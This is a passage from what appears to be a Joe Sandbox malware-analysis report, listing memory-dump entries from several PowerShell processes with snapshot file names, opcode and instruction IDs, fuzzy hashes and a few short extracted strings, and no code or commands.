                                                                    • Instruction Fuzzy Hash: 3721F87190CB4C8FEB59DFAC984A7E97FE0EB96321F04416BD048C3152DA74A41ACB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 51d818617c0e74ffd9bb42a9def156bf9a14ba9b9cc0943c138d5fcef02ce558
                                                                    • Instruction ID: 1e5bd758335f677c9b66642ad8b23a59372f7adf3a9632f0066e310293637eff
                                                                    • Opcode Fuzzy Hash: 51d818617c0e74ffd9bb42a9def156bf9a14ba9b9cc0943c138d5fcef02ce558
                                                                    • Instruction Fuzzy Hash: 6621C323B0DA974FE7E5EB1C48F11746AD2EF56650B5981BAD29DC71A3CE2CEC04A301
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6e3657235895eb54140cfb06727246d45b2c9361054c1e071ac85f0ce71cb081
                                                                    • Instruction ID: 9de9ba2714f862cef0180405040ad55cc0cca7eb914a6ae271e48c163365806b
                                                                    • Opcode Fuzzy Hash: 6e3657235895eb54140cfb06727246d45b2c9361054c1e071ac85f0ce71cb081
                                                                    • Instruction Fuzzy Hash: EA11E332B0D6894FEB91DF9844B45A87BD1EF5A320F0440BFC54DEB193DA28A845E350
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244978323.00007FFD34870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34870000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd34870000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 862c9b69d063a66dfc1831f926b8d0c84d53fd0bbdbbe932889cce3d839b9279
                                                                    • Instruction ID: 9701f0050ad68a6c77f4177eb54b6e3c5ca6baa10cf27f5787e36c27ea31aac9
                                                                    • Opcode Fuzzy Hash: 862c9b69d063a66dfc1831f926b8d0c84d53fd0bbdbbe932889cce3d839b9279
                                                                    • Instruction Fuzzy Hash: D3112532B0E9894FE3A1E72C58B48B87BD1FF4262070800F6D29DD71A3DA29AC10A340
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction ID: 0a84c860f013be5360dc54d427524c8b7572197af3ada10ad28df495537e80d8
                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction Fuzzy Hash: 2501677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.2244526939.00007FFD347A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD347A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ffd347a0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K_^4$K_^7$K_^F$K_^J
                                                                    • API String ID: 0-377281160
                                                                    • Opcode ID: 34310539d2dbbe052e35c312abb072568bf97e18b880dfc370ce0cec5a804e58
                                                                    • Instruction ID: a9df2db955e23b3f35e66654de59260e4ad61196ecaeb889a9e2e5a958b0a231
                                                                    • Opcode Fuzzy Hash: 34310539d2dbbe052e35c312abb072568bf97e18b880dfc370ce0cec5a804e58
                                                                    • Instruction Fuzzy Hash: 292135F77089266FD7127BBCB8555EE3BA4CF9927834502B3D198DB013E914B09B8AC0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d47a560e978978338d7f7aa9a66fdf15d8153c6b7dcd78af81ba0e39c2585037
                                                                    • Instruction ID: 8acae8d7f53dd6f660037f9e96057c9115bc05551b5efbd8405431c143fdf7ff
                                                                    • Opcode Fuzzy Hash: d47a560e978978338d7f7aa9a66fdf15d8153c6b7dcd78af81ba0e39c2585037
                                                                    • Instruction Fuzzy Hash: 1F510632B4DA9A4FE7E9AB1D44A127477D2EF96620B5801FAC24EC7293DD18EC058341
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6ab652c3c205b3c561fe4d34939ff93c65236d02511b6aaf2a2e3868babce3e
                                                                    • Instruction ID: 760718e48f934564076e07d5fe343123f6f4f3bd414515768696aeaee4d4b558
                                                                    • Opcode Fuzzy Hash: d6ab652c3c205b3c561fe4d34939ff93c65236d02511b6aaf2a2e3868babce3e
                                                                    • Instruction Fuzzy Hash: 0D412833B4DA5A4FE7A5EB1D54A12B477D2EF56620B1800FBC24EC72A3DE18EC058341
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40352c9c0791c5e049dd8769154d5602188bfe2e6dafdf1e151426c6f3417a40
                                                                    • Instruction ID: b8c17ae04a02a67b7c8fe5ee9b6bdd39c1d3626130473a469ac1a1ad261c1e7b
                                                                    • Opcode Fuzzy Hash: 40352c9c0791c5e049dd8769154d5602188bfe2e6dafdf1e151426c6f3417a40
                                                                    • Instruction Fuzzy Hash: 6C413B7190CB888FDB59DF1C9C4A6A97FE0FB56311F04416FD449D3292CA64B855CBC2
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2350933798.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd3466d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31e6859d77544d97fd8fa94a3478910c4a51b0453df49bf9677a31b434c39fd0
                                                                    • Instruction ID: 409b0a388cf0d148406e70f8eb446945f0cb76f41b2de9671e59cfc7c9b803b3
                                                                    • Opcode Fuzzy Hash: 31e6859d77544d97fd8fa94a3478910c4a51b0453df49bf9677a31b434c39fd0
                                                                    • Instruction Fuzzy Hash: 2641E33040DBC44FE7569B29D895A963FF0EF57220B1905DFD088CB1A3D62DAC46C792
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e415edc1c4ea1c5534d5e8e39cd36dff2accb31b577b631d7dfef2b1a39b48bb
                                                                    • Instruction ID: 023364bac42fbead7936832e9e9d9fe3e253f409d46e2a3589d13c027b4e8c2f
                                                                    • Opcode Fuzzy Hash: e415edc1c4ea1c5534d5e8e39cd36dff2accb31b577b631d7dfef2b1a39b48bb
                                                                    • Instruction Fuzzy Hash: 0431F632B0DA494FE7A5E75DA4A1AF8B7E1EF45620B0800FBC65DC71A3DA19EC15C381
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: af365de3d1c14758ced41bfe318bd1140d118309dec4abcb764db9ca43c61229
                                                                    • Instruction ID: 77b4500fd7d6e86f974b1b0a6a3e5948314c4765f489e519be754227812197f1
                                                                    • Opcode Fuzzy Hash: af365de3d1c14758ced41bfe318bd1140d118309dec4abcb764db9ca43c61229
                                                                    • Instruction Fuzzy Hash: 3321287090C74C8FEB59DBAC984A7E97FE0EB96321F04416BD048C3152DA74A81ACB92
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352988616.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e0c015fa09304a56affff892f56aa789f306f6cd280c4aa93552a8e8503c964c
                                                                    • Instruction ID: 6f82232fe581a0fc079faf2de7413de1ed71216aed173faae0198b090143e0d2
                                                                    • Opcode Fuzzy Hash: e0c015fa09304a56affff892f56aa789f306f6cd280c4aa93552a8e8503c964c
                                                                    • Instruction Fuzzy Hash: E711E332B0D6894FEB91DF9844E45A87BD1EF5A315F1840FFC64DEB193DA28A845D310
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction ID: e35d54fb46a0325d3c9533a66cc66369ca9705c70068c201e4045385024973ef
                                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                    • Instruction Fuzzy Hash: D301677121CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3651DA36E882CB45
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d397633a3502b850662e81819f350c261013c16b5307b2d45868ebce0072a778
                                                                    • Instruction ID: 79fa219e8ae4ff3319e27152918a843b1aff2f9cd6462bc97453de2eee2ee92b
                                                                    • Opcode Fuzzy Hash: d397633a3502b850662e81819f350c261013c16b5307b2d45868ebce0072a778
                                                                    • Instruction Fuzzy Hash: 1DF0FC7AA09A8C4FDB81DF2C98661D5BFE0FF67211B0502ABD508C7151DA255848C7C1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2352010046.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
                                                                    • API String ID: 0-962139525
                                                                    • Opcode ID: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction ID: 6ee93f0a4304a5c5048fde7c0ab53bc99d3155f9f9a09ac8c2a541ffee2ce9ab
                                                                    • Opcode Fuzzy Hash: 32ba26589fa0e7a62dd8a312b3dc4cc8d233eb561294beb8cf2edc3a6d3793b8
                                                                    • Instruction Fuzzy Hash: 4021F9B37049169BD21136BCB8529ED7784DF5537938603F3E128DF153ED18649B8AC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 94fdfaf16e965f269e3a70f3a99d736d04b37f87fceced47e2e2bad52da896b9
                                                                    • Instruction ID: 73f78c38685ccc53b5ad06edf6e21f85b918cea1750b1cd84d309ccc4de0a4f9
                                                                    • Opcode Fuzzy Hash: 94fdfaf16e965f269e3a70f3a99d736d04b37f87fceced47e2e2bad52da896b9
                                                                    • Instruction Fuzzy Hash: B4711BA7B0DA968BF711676C9CB71FA7B90DF13338B4844B2C688CA053FD1D245696C2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e2bfb75ae1d0ca8b38946aeb96d568ba056f1f20b49bd525cdf397bcddeb342d
                                                                    • Instruction ID: 7a827560137fb49eb6d77ac2a2db67e76a2fde488cf86aa1c34af69ec26c8bda
                                                                    • Opcode Fuzzy Hash: e2bfb75ae1d0ca8b38946aeb96d568ba056f1f20b49bd525cdf397bcddeb342d
                                                                    • Instruction Fuzzy Hash: EB5149B2A0DB859FEB189B185C561F8BFE0FF66310F44817FD449C3192DA68B8158BC2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2503051480.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd3465d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d599f8d17917301cf46258d4619e85c8cb03fb8a4d890482da1b50f7a222d8c5
                                                                    • Instruction ID: 558887eb0406fde6e87a3bdc5eb29042fdb5efdf306cc1f81315e6d764b35c7e
                                                                    • Opcode Fuzzy Hash: d599f8d17917301cf46258d4619e85c8cb03fb8a4d890482da1b50f7a222d8c5
                                                                    • Instruction Fuzzy Hash: 1641197180DBC44FE7568B29D8559923FF1EF57320B1901DFD088CB1A3DA29AC46C7A2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c7d097cd6abc4040b902d2f460c15fd025d3cdb6cf12f595e869c779dfdca1fc
                                                                    • Instruction ID: 455541d5ccc14ce7e5482a8a3c1ac647ea0bbf831af4ed28e621a58155839713
                                                                    • Opcode Fuzzy Hash: c7d097cd6abc4040b902d2f460c15fd025d3cdb6cf12f595e869c779dfdca1fc
                                                                    • Instruction Fuzzy Hash: B321067190CB4C8FEB59DBAC9C4A6E97FE0EB96321F04416BD048C3152DA75A416CB92
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
                                                                    • Instruction ID: 05a5f9c747fefc10e1660c34fd8e80ee1659bd8927824b29764c4762f1264cb1
                                                                    • Opcode Fuzzy Hash: fc120fa896c26b7aa0e1e81f405f54f1f3a662688459dd55c238861bde43faf8
                                                                    • Instruction Fuzzy Hash: F8110A32B0D6894FE791DF9840E4568BBD1EF5A320F0440BFC54DE7293D92C5845D310
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction ID: 2cc47b0ba0fdde9b7c4ba52e5ec4494637230a7301f5fb9479e41aed1cd45b64
                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                    • Instruction Fuzzy Hash: 6D01677121CB0C8FD754EF0CE451AB5B7E0FB95364F50056DE58AC3691DA36E882CB45
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                    • Instruction ID: fafa7b70c5f5b17712e049d9948d614491e66278ae9aa370f0abdc36be851d6e
                                                                    • Opcode Fuzzy Hash: 8b16e96691e6b9fd6b3c6e010f46d332a63262ccbacafdb2254b3d1dff21d6d5
                                                                    • Instruction Fuzzy Hash: 78F05E32B0C9558FD7A9EB4CE4914E873E1EF5A36071500BAE25DC7663DA3AEC45C740
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                    • Instruction ID: 15b2bfcbdbf5d784a94618a39bec91f5fccbc2fb93c30f22f997228f6207f3e3
                                                                    • Opcode Fuzzy Hash: ebf203ff7e46d37984dc3f014a37674e0a82800bbf86f493c519be4e455e16ee
                                                                    • Instruction Fuzzy Hash: 61F05E32B0D5448FDB94EB4CE4914A877E0FF4A72475500B7E25DC7663DA2AAC44C750
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504842715.00007FFD34840000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34840000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34840000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction ID: f7dbd9fce67771b93a9bbfec132734dfb62449b86e3f2ab7c658e19e21ab47df
                                                                    • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                    • Instruction Fuzzy Hash: B1E04F31B0C8188FDA68DB0CE0909E973E1EF9D33171101B7D24EC7661CA26EC51DB80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000A.00000002.2504020529.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_10_2_7ffd34770000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: N_^4$N_^7$N_^F$N_^J
                                                                    • API String ID: 0-3508309026
                                                                    • Opcode ID: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                    • Instruction ID: 76e74cc2789b1994d237be30e67308376eef35d5054b1cd0edc6f5241bd7a9cc
                                                                    • Opcode Fuzzy Hash: eafd3b313e7fad8c214e9a181eb89bab8aa67dcd7a7cfaa920db0e5adb94a3ed
                                                                    • Instruction Fuzzy Hash: 6D2126B7B088266FD3117BFDBC255EE3B44DF9523874902B2D298DB143E914709A8AC2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: K
                                                                    • API String ID: 0-856455061
                                                                    • Opcode ID: b902d7c93624e10a1ad7713f755a79aa94881159142300c17ef91e2a16f2603c
                                                                    • Instruction ID: a9794d36a781eb28f178a8692c447723067e02eaeb4d44fdaabc61060eca4b4b
                                                                    • Opcode Fuzzy Hash: b902d7c93624e10a1ad7713f755a79aa94881159142300c17ef91e2a16f2603c
                                                                    • Instruction Fuzzy Hash: 47A127B2A0EBC59FE756976C5C6A1A97FA0EF53221F0801FBD1D8C70D3D918A805C782
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7a37ed6d0201d3a122ddb032800006a76d9d1fc91743fbafd0b364af906f84ac
                                                                    • Instruction ID: 98fdd26a28ce259d983e0dedb26f1bbe25e7f649067259ae567d8cb3fb6402fa
                                                                    • Opcode Fuzzy Hash: 7a37ed6d0201d3a122ddb032800006a76d9d1fc91743fbafd0b364af906f84ac
                                                                    • Instruction Fuzzy Hash: 2AD16E70A08A4D8FDF95DF58C4A5AAD77E1FF69301F14416AD40DD72A6CA38E881CBC1
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9d67c989d29bdcb84d87c9ccc8afcadd5ec7c12466acc2e668abe6bbd762f2d
                                                                    • Instruction ID: 38c571e17c193dfbe94f00782904688004bf542e3987e6a9bcfaece2a495beae
                                                                    • Opcode Fuzzy Hash: c9d67c989d29bdcb84d87c9ccc8afcadd5ec7c12466acc2e668abe6bbd762f2d
                                                                    • Instruction Fuzzy Hash: B9510533B4DA5A4FE7E9AB1D44A16B477D2EF96620B5800FAC24EC7293DD28EC058341
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2fca0294730a3906e58795a148692095ef477cc84e740793a90eeed34384f46d
                                                                    • Instruction ID: 89734c3fab33e81126894573f003d3a4fe86e3cd82ce677f414979ecfefd037c
                                                                    • Opcode Fuzzy Hash: 2fca0294730a3906e58795a148692095ef477cc84e740793a90eeed34384f46d
                                                                    • Instruction Fuzzy Hash: 7B412633B4DA5A4FE7A9EB1D54A16B477D2EF56620B1800FBD24EC72A3DE18EC058341
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2698090417.00007FFD3466D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3466D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd3466d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b743d13c7119408abe96f95a26b77876a643159ca4474ee317162074bc0b02c1
                                                                    • Instruction ID: 777fe191c56229496d54fb7e42a731b731e5255c657b9f6faeb9e0940f42c7f7
                                                                    • Opcode Fuzzy Hash: b743d13c7119408abe96f95a26b77876a643159ca4474ee317162074bc0b02c1
                                                                    • Instruction Fuzzy Hash: 0341437190EBC44FE7568B28D8959A63FF0EF53320B1501EFD089CB1A3D62DA806C792
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9bd01a2710e857012a031a3945789c13f43a7eaa9898dc234edd382c68592319
                                                                    • Instruction ID: b07af49addb4cd9f12ed89c5385dcfe44999ea54446fdd9f76815509426a2b64
                                                                    • Opcode Fuzzy Hash: 9bd01a2710e857012a031a3945789c13f43a7eaa9898dc234edd382c68592319
                                                                    • Instruction Fuzzy Hash: 47312632B0DA494FE7A4E75CA4A1AF877E1EF85620B1800FBC24DC31A3DA19EC11C380
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34780000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9f9d0f3c2e831395b15c0094210f4a9fb1306f3d97ff1d14601ecfa005c1a75a
                                                                    • Instruction ID: 659a15287473ed1cd860ddbbcf2b3b94f8821aca2441e243acee92c87a406a97
                                                                    • Opcode Fuzzy Hash: 9f9d0f3c2e831395b15c0094210f4a9fb1306f3d97ff1d14601ecfa005c1a75a
                                                                    • Instruction Fuzzy Hash: 96214B3090C74C8FDB59DB6C984A7E97FE0EB96321F00415BD048C3152DA74A816CB91
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2701461040.00007FFD34850000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34850000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_7ffd34850000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac9cf3f62fa8e73728c76a19b0ce3397967c02cf0b33475fbf2502c22425fd1a
                                                                    • Instruction ID: 5a31647b026f130c176bdf82f97337cff45cb2b1a7a901c642f2add91a8235b1
                                                                    • Opcode Fuzzy Hash: ac9cf3f62fa8e73728c76a19b0ce3397967c02cf0b33475fbf2502c22425fd1a
                                                                    • Instruction Fuzzy Hash: 68112332B0D6894FEB95DF9840E41A87BD1EF1A310F0800FFC64DEB193DA28A844D310
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.2699985071.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false